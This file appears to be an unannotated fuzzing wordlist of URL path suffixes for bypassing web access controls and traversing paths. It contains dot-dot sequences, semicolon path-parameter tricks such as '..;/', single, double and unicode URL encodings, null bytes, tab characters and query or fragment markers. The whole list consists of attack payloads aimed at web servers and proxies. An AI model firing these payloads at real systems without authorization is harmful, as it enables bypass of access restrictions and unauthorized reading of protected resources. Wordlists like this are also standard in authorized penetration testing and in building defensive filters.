.
..
.html
.json
.php
.%00
.%00/
..%0d/
..%0d/;
..%0d;/
..%00/
..%00/;
..%00;/
..%5c/
..%09
..%ff/
..%ff/;
..%ff;/
../
..;%0d/
..;%00/
..;%ff/
..;\
..;\;
..\
..\;
#
#?
%2e%2e
%2e%2e/
%2f
%2f%2f
%2f%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
%2f%20%23
%2f%23
%2f/
%2f/%2f
%2f//
%2f;?
%2f?;
%3b
%3b%2f%2e.
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3b%2f..
%3b%09
%3b/%2e.
%3b/%2e%2e/..%2f%2f
%3b/%2f%2f../
%3b/..
%3b//%2f../
%3f.php
%3f%3f
%3f%23
%09
%09%3b
%09..
%09;
%20
%23
%23%3f
%252f%252f
%252f/
%u002e
%u002e/%u002e
%u002e;
/
/x/../
/x/..//
/x/../;/
/x/..;/
/x/..;//
/x/..;/;/
/x//../
/x//..;/
/x/;/../
/x/;/..;/
/#
/%2e%2e
/%2e%2e%2f/
/%2e%2e%3b/
/%2e%2e/
/%2e%2f/
/%2e%3b/
/%2e%3b//
/%2e/
/%2e//
/%2f
/%2f/
/%3b/
/%20
/%20#
/%20%23
/%23
/%252e%252e%252f/
/%252e%252e%253b/
/%252e%252f/
/%252e%253b/
/%252e/
/%252f
/%u002e/%u002e
/%u002e/%u002e;
/%u002e;
/.%00
/.%00/
/..
/..%2f
/..%2f..%2f
/..%2f..%2f..%2f
/../
/../../
/../../../
/../../..//
/../..//
/../..//../
/../..;/
/.././../
/../.;/../
/..//
/..//../
/..//../../
/..//..;/
/../;/
/../;/../
/..;%2f
/..;%2f..;%2f
/..;%2f..;%2f..;%2f
/..;/
/..;/../
/..;/..;/
/..;//
/..;//../
/..;//..;/
/..;/;/
/..;/;/..;/
/./
/.//
/.;/
/.;//
//
//%2f
//..
//../../
//..;
//./
//.;/
///
///..
///../
///..//
///..;
///..;/
///..;//
//;/
/;x
/;x/
/;/
/;//
/;?
/?
/?;
;
;x
;x/
;x;
;%2F..
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2f%2f/../
;%2f..
;%2f..%2f%2e%2e%2f%2f
;%2f..%2f..%2f%2f
;%2f..%2f/
;%2f..%2f/..%2f
;%2f..%2f/../
;%2f../%2f..%2f
;%2f../%2f../
;%2f..//..%2f
;%2f..//../
;%2f..///
;%2f..///;
;%2f..//;/
;%2f..//;/;
;%2f../;//
;%2f../;/;/
;%2f../;/;/;
;%2f..;///
;%2f..;//;/
;%2f..;/;//
;%2f/%2f../
;%2f//..%2f
;%2f//../
;%2f//..;/
;%2f/;/../
;%2f/;/..;/
;%2f;//../
;%2f;/;/..;/
;%09
;%09..
;%09..;
;%09;
;/%2e.
;/%2e%2e
;/%2e%2e%2f%2f
;/%2e%2e%2f/
;/%2e%2e/
;/%2f%2f../
;/%2f/..%2f
;/%2f/../
;/.%2e
;/.%2e/%2e%2e/%2f
;/..
;/..%2f
;/..%2f%2f../
;/..%2f..%2f
;/..%2f/
;/..%2f//
;/../
;/../%2f/
;/../../
;/../..//
;/.././../
;/../.;/../
;/..//
;/..//%2e%2e/
;/..//%2f
;/..//../
;/..///
;/../;/
;/../;/../
;/..;
;/.;.
;//%2f../
;//..
;//../../
;///..
;///../
;///..//
;?
?
?.php
?#
?;
??
